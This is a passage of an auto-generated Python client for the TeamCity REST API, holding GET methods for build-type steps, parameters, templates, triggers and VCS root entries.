'/app/rest/buildTypes/{btLocator}/snapshot-dependencies', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotDependencies', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_step_with_http_info(self, bt_locator, step_id, **kwargs): # noqa: E501
"""get_step # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_step_with_http_info(bt_locator, step_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str step_id: (required)
:param str fields:
:return: Step
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'step_id', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_step" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_step`") # noqa: E501
# verify the required parameter 'step_id' is set
if ('step_id' not in params or
params['step_id'] is None):
raise ValueError("Missing the required parameter `step_id` when calling `get_step`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'step_id' in params:
if isinstance(params['step_id'], TeamCityObject):
path_params['stepId'] = params['step_id'].locator_id
else:
path_params['stepId'] = params['step_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/steps/{stepId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Step', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_step_parameter_with_http_info(self, bt_locator, step_id, parameter_name, **kwargs): # noqa: E501
"""get_step_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_step_parameter_with_http_info(bt_locator, step_id, parameter_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str step_id: (required)
:param str parameter_name: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'step_id', 'parameter_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_step_parameter" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_step_parameter`") # noqa: E501
# verify the required parameter 'step_id' is set
if ('step_id' not in params or
params['step_id'] is None):
raise ValueError("Missing the required parameter `step_id` when calling `get_step_parameter`") # noqa: E501
# verify the required parameter 'parameter_name' is set
if ('parameter_name' not in params or
params['parameter_name'] is None):
raise ValueError("Missing the required parameter `parameter_name` when calling `get_step_parameter`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'step_id' in params:
if isinstance(params['step_id'], TeamCityObject):
path_params['stepId'] = params['step_id'].locator_id
else:
path_params['stepId'] = params['step_id'] # noqa: E501
if 'parameter_name' in params:
if isinstance(params['parameter_name'], TeamCityObject):
path_params['parameterName'] = params['parameter_name'].locator_id
else:
path_params['parameterName'] = params['parameter_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/steps/{stepId}/parameters/{parameterName}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_step_parameters_with_http_info(self, bt_locator, step_id, **kwargs): # noqa: E501
"""get_step_parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_step_parameters_with_http_info(bt_locator, step_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str step_id: (required)
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'step_id', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_step_parameters" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_step_parameters`") # noqa: E501
# verify the required parameter 'step_id' is set
if ('step_id' not in params or
params['step_id'] is None):
raise ValueError("Missing the required parameter `step_id` when calling `get_step_parameters`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'step_id' in params:
if isinstance(params['step_id'], TeamCityObject):
path_params['stepId'] = params['step_id'].locator_id
else:
path_params['stepId'] = params['step_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/steps/{stepId}/parameters', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Properties', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_step_setting_with_http_info(self, bt_locator, step_id, field_name, **kwargs): # noqa: E501
"""get_step_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_step_setting_with_http_info(bt_locator, step_id, field_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str step_id: (required)
:param str field_name: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'step_id', 'field_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_step_setting" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_step_setting`") # noqa: E501
# verify the required parameter 'step_id' is set
if ('step_id' not in params or
params['step_id'] is None):
raise ValueError("Missing the required parameter `step_id` when calling `get_step_setting`") # noqa: E501
# verify the required parameter 'field_name' is set
if ('field_name' not in params or
params['field_name'] is None):
raise ValueError("Missing the required parameter `field_name` when calling `get_step_setting`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'step_id' in params:
if isinstance(params['step_id'], TeamCityObject):
path_params['stepId'] = params['step_id'].locator_id
else:
path_params['stepId'] = params['step_id'] # noqa: E501
if 'field_name' in params:
if isinstance(params['field_name'], TeamCityObject):
path_params['fieldName'] = params['field_name'].locator_id
else:
path_params['fieldName'] = params['field_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/steps/{stepId}/{fieldName}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_steps_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_steps # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_steps_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:return: Steps
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_steps" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_steps`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/steps', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Steps', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_template_with_http_info(self, bt_locator, template_locator, **kwargs): # noqa: E501
"""get_template # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_template_with_http_info(bt_locator, template_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str template_locator: (required)
:param str fields:
:return: BuildType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'template_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_template" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_template`") # noqa: E501
# verify the required parameter 'template_locator' is set
if ('template_locator' not in params or
params['template_locator'] is None):
raise ValueError("Missing the required parameter `template_locator` when calling `get_template`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'template_locator' in params:
if isinstance(params['template_locator'], TeamCityObject):
path_params['templateLocator'] = params['template_locator'].locator_id
else:
path_params['templateLocator'] = params['template_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/templates/{templateLocator}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BuildType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_templates_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_templates # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_templates_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:return: BuildTypes
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_templates" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_templates`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/templates', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BuildTypes', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_trigger_with_http_info(self, bt_locator, trigger_locator, **kwargs): # noqa: E501
"""get_trigger # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_trigger_with_http_info(bt_locator, trigger_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str trigger_locator: (required)
:param str fields:
:return: Trigger
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'trigger_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_trigger" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_trigger`") # noqa: E501
# verify the required parameter 'trigger_locator' is set
if ('trigger_locator' not in params or
params['trigger_locator'] is None):
raise ValueError("Missing the required parameter `trigger_locator` when calling `get_trigger`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'trigger_locator' in params:
if isinstance(params['trigger_locator'], TeamCityObject):
path_params['triggerLocator'] = params['trigger_locator'].locator_id
else:
path_params['triggerLocator'] = params['trigger_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/triggers/{triggerLocator}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Trigger', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_trigger_setting_with_http_info(self, bt_locator, trigger_locator, field_name, **kwargs): # noqa: E501
"""get_trigger_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_trigger_setting_with_http_info(bt_locator, trigger_locator, field_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str trigger_locator: (required)
:param str field_name: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'trigger_locator', 'field_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_trigger_setting" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_trigger_setting`") # noqa: E501
# verify the required parameter 'trigger_locator' is set
if ('trigger_locator' not in params or
params['trigger_locator'] is None):
raise ValueError("Missing the required parameter `trigger_locator` when calling `get_trigger_setting`") # noqa: E501
# verify the required parameter 'field_name' is set
if ('field_name' not in params or
params['field_name'] is None):
raise ValueError("Missing the required parameter `field_name` when calling `get_trigger_setting`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'trigger_locator' in params:
if isinstance(params['trigger_locator'], TeamCityObject):
path_params['triggerLocator'] = params['trigger_locator'].locator_id
else:
path_params['triggerLocator'] = params['trigger_locator'] # noqa: E501
if 'field_name' in params:
if isinstance(params['field_name'], TeamCityObject):
path_params['fieldName'] = params['field_name'].locator_id
else:
path_params['fieldName'] = params['field_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/triggers/{triggerLocator}/{fieldName}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_triggers_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_triggers # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_triggers_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:return: Triggers
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_triggers" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_triggers`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/triggers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Triggers', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_vcs_labeling_options_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_vcs_labeling_options # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_vcs_labeling_options_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:return: VcsLabeling
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vcs_labeling_options" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_vcs_labeling_options`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcsLabeling', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VcsLabeling', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_vcs_root_entries_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_vcs_root_entries # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_vcs_root_entries_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:return: VcsRootEntries
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vcs_root_entries" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_vcs_root_entries`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcs-root-entries', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VcsRootEntries', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_vcs_root_entry_with_http_info(self, bt_locator, vcs_root_locator, **kwargs): # noqa: E501
"""get_vcs_root_entry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_vcs_root_entry_with_http_info(bt_locator, vcs_root_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str vcs_root_locator: (required)
:param str fields:
:return: VcsRootEntry
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'vcs_root_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vcs_root_entry" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_vcs_root_entry`") # noqa: E501
# verify the required parameter 'vcs_root_locator' is set
if ('vcs_root_locator' not in params or
params['vcs_root_locator'] is None):
raise ValueError("Missing the required parameter `vcs_root_locator` when calling `get_vcs_root_entry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'vcs_root_locator' in params:
if isinstance(params['vcs_root_locator'], TeamCityObject):
path_params['vcsRootLocator'] = params['vcs_root_locator'].locator_id
else:
path_params['vcsRootLocator'] = params['vcs_root_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcs-root-entries/{vcsRootLocator}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VcsRootEntry', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_vcs_root_entry_checkout_rules_with_http_info(self, bt_locator, vcs_root_locator, **kwargs): # noqa: E501
"""get_vcs_root_entry_checkout_rules # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_vcs_root_entry_checkout_rules_with_http_info(bt_locator, vcs_root_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str vcs_root_locator: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'vcs_root_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vcs_root_entry_checkout_rules" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_vcs_root_entry_checkout_rules`") # noqa: E501
# verify the required parameter 'vcs_root_locator' is set
if ('vcs_root_locator' not in params or
params['vcs_root_locator'] is None):
raise ValueError("Missing the required parameter `vcs_root_locator` when calling `get_vcs_root_entry_checkout_rules`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'vcs_root_locator' in params:
if isinstance(params['vcs_root_locator'], TeamCityObject):
path_params['vcsRootLocator'] = params['vcs_root_locator'].locator_id
else:
path_params['vcsRootLocator'] = params['vcs_root_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcs-root-entries/{vcsRootLocator}/checkout-rules', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_zipped_with_http_info(self, path, bt_locator, **kwargs): # noqa: E501
"""get_zipped # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_zipped_with_http_info(path, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str path: (required)
:param str bt_locator: (required)
:param str base_path:
:param str locator:
